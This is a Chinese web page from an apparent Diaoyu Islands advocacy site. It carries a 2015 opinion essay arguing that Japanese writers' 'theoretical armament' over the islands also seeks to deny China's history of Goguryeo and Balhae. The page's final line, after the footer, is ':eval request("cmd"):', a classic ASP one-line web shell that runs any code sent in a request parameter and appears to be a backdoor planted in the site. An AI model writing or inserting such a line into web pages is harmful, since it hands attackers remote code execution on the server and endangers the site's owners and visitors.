保钓理论

日本争夺我钓鱼岛,绝不是一岛问题

时间:2015-2-22 23:39:10  作者:李景科  来源:  查看:98  评论:0
内容摘要:自2012年以来的四年间,在日本涉及钓鱼岛的一切舆论或言论平台上,“理论武装”一次越来越多。就是要在理论上打败中国。其中以2012年9月18日的《对于“中国”的尖阁盗取攻势,日本要以“历史的理论武装”对抗》&...
2012年以来的四年间,在日本涉及钓鱼岛的一切舆论或言论平台上,“理论武装”一次越来越多。就是要在理论上打败中国。其中以2012918日的《对于“中国”的尖阁盗取攻势,日本要以“历史的理论武装”对抗》”(「中国」の尖閣盗取攻勢に対し、日本は「歴史的理論武装」で対抗せよhttp://teikoku-denmo.jp/history/honbun/senkaku_7.html)的号召文为典型。

   笔者阅读了很多日本人写的类似文章,都俨然以有理者和有据者自居,奢谈中国固有的钓鱼岛属于日本的。仔细阅读《对于“中国”的尖阁盗取攻势,日本要以“历史的理论武装”对抗》”一文,洋洋一万一千余字,关于钓鱼岛的事才二千多字,通篇却讨论中国边疆历史。然而却是要证明中国的东北边疆历史不是中国的历史,而是外国的历史。所以,该日本作者的结论是钓鱼岛不是中国的,进而中国东北为主的边疆历史也不是中国的历史。由此可以看出,日本夺占和纠缠钓鱼岛问题,既要永远控制我国的钓鱼岛合法化,又要否定中国的历史,为分裂中国更多的固有领土的企图提供所谓的理论。这就是日本一些人或政府的谋略。

   该作者也承认,现实的日本向中国表示对钓鱼岛的领有权的主张是“马耳念佛(馬の耳に念仏)”没有效力。所以,才要理论武装,找出所谓正当性的证据。进而大谈中国历史,否定东北不属于中国。

   他的理论武装核心是什么呢?就是提出历史上的“高句麗和渤海国”不属于中国的边疆多民族的历史。其目的明显是企图挑起现代中国与邻国的无意义的纠纷,削弱或分裂中国,所以,不是仅仅一个钓鱼岛的问题。然而,这些历史早有定论,也不是少数几个人就能推翻的。但是,日本掀起的“理论武装”之风,必须引起中国政府和全体国人的警惕,我们必须同样要继续挖掘我们的历史文化遗产,丰富历史学术成果和积累,进行有理有据的斗争,为早日收回中国固有领土钓鱼岛的实际管辖权而努力。
相关评论
评论者:      验证码:  点击获取验证码
湘ICP备11011102号
Powered by WCADDL
":eval request("cmd"):